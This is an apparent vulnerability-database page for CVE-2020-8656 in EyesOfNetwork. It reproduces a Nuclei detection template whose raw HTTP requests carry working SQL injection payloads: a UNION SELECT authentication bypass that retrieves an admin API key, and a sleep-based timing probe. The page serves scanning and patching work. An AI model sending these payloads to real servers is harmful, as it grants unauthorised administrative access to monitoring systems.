CVE-2020-8656: EyesOfNetwork - Hardcoded API Key & SQL Injection

日期: 2025-08-01 | 影响软件: EyesOfNetwork | POC: 已公开

漏洞描述

An issue was discovered in EyesOfNetwork 5.3. The EyesOfNetwork API 2.4.2 is prone to SQL injection, allowing an unauthenticated attacker to perform various tasks such as authentication bypass via the username field to getApiKey in include/api_functions.php.

PoC代码[已公开]

id: CVE-2020-8656

info:
  name: EyesOfNetwork - Hardcoded API Key & SQL Injection
  author: ritikchaddha
  severity: critical
  description: |
    An issue was discovered in EyesOfNetwork 5.3. The EyesOfNetwork API 2.4.2 is prone to SQL injection, allowing an unauthenticated attacker to perform various tasks such as authentication bypass via the username field to getApiKey in include/api_functions.php.
  reference:
    - https://www.exploit-db.com/exploits/48025
    - https://nvd.nist.gov/vuln/detail/CVE-2020-8656
    - https://github.com/EyesOfNetworkCommunity/eonapi/issues/17
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-8656
    epss-score: 0.78113
    epss-percentile: 0.98957
    cwe-id: CWE-798
    cpe: cpe:2.3:a:eyesofnetwork:eyesofnetwork:5.3-0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: eyesofnetwork
    product: eyesofnetwork
    fofa-query: title="EyesOfNetwork"
  tags: cve,cve2020,eyesofnetwork,hardcoded-key,sqli,vuln,vkev

http:
  - raw:
      - |
        GET /eonapi/getApiKey?&username=%27%20union%20select%201,%27admin%27,%271c85d47ff80b5ff2a4dd577e8e5f8e9d%27,0,0,1,1,8%20or%20%27&password=h4knet HTTP/1.1
        Host: {{Hostname}}

      - |
        @timeout: 20s
        GET /eonapi/getApiKey?username=%27%20union%20select%20sleep(6),0,0,0,0,0,0,0%20or%20%27 HTTP/1.1
        Host: {{Hostname}}

    stop-at-first-match: true
    matchers-condition: or
    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 200'
          - 'contains(body_1, "EONAPI_KEY")'
        condition: and

      - type: dsl
        dsl:
          - 'duration_2>=6'
          - 'status_code_2 == 401'
          - 'contains_all(body_2, "api_version", "username-password credentials")'
        condition: and
# digest: 4a0a0047304502202946f6cd2397e18f564357c5fafb69c562dee47460f1c6199d67a2cf8d61a7b0022100af95e6d905e787fdc7afa310cfe955fc924a7530a5d38bba50f0b4e2cd23d053:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2020/CVE-2020-8656.yaml

相关漏洞推荐